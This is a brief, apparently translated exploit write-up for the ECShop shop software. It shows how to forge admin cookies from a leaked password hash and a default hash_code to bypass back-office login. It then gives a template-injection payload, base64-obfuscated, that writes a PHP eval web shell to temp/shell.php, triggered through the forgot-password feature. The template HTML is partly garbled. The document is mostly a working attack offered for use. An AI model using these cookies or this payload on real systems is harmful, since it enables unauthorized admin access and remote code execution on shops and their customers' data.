There were several ecshop vulnerabilities before, and the password was obtained but could not be cracked, although the background was known.
User password admin: d03a7617433c2826976062fec569a434
Echo has a table ecs_shop_config, which contains hash_code. It seems that both 2.7.2 and 2.7.3 are 31693422540744c0a6b6da635b7a5a93
Then use the password of the previous admin and the hash_code to put together MD5 again
md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4c01994bce575
At this time, use a browser that can modify COOKIE. Modify the cookie to
ECSCP[admin_id]=1; ECSCP[admin_pass]=76bb7b55d4d0b8283fd4c01994bce575; ECSCP_ID=b5a19c09952c8d1b09a97a89f48df8d1575f1dd1
The ECSCP_ID in the back is optional, and then you can access the background. Anyway, I have succeeded N times, and I don't understand you.
{$user_name'];file_put_contents(base64_decode('Li4vdGVtcC9zaGVsbC5waHA='),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4=')); echo $var['$user_name} < p> Hello {$user_name}& lt;br /> < br /> You have already reset your password. Please click the following link (or copy it to your browser):< br /> < br /> < atarget ="_blank"href="{$reset_email}">{$reset_email}<br /> < br /> To confirm your new password reset operation& lt;br /> < br /> {$shop_name}< br /> {$send_date}</ atarget></p>
Click Forgot Password at the background login location, enter the user and email to submit, and a one sentence trojan of shell.php will be generated under temp. The password is 207
Li4vdGVtcC9zaGVsbC5waHA=decrypt with base64 is/ temp/shell.php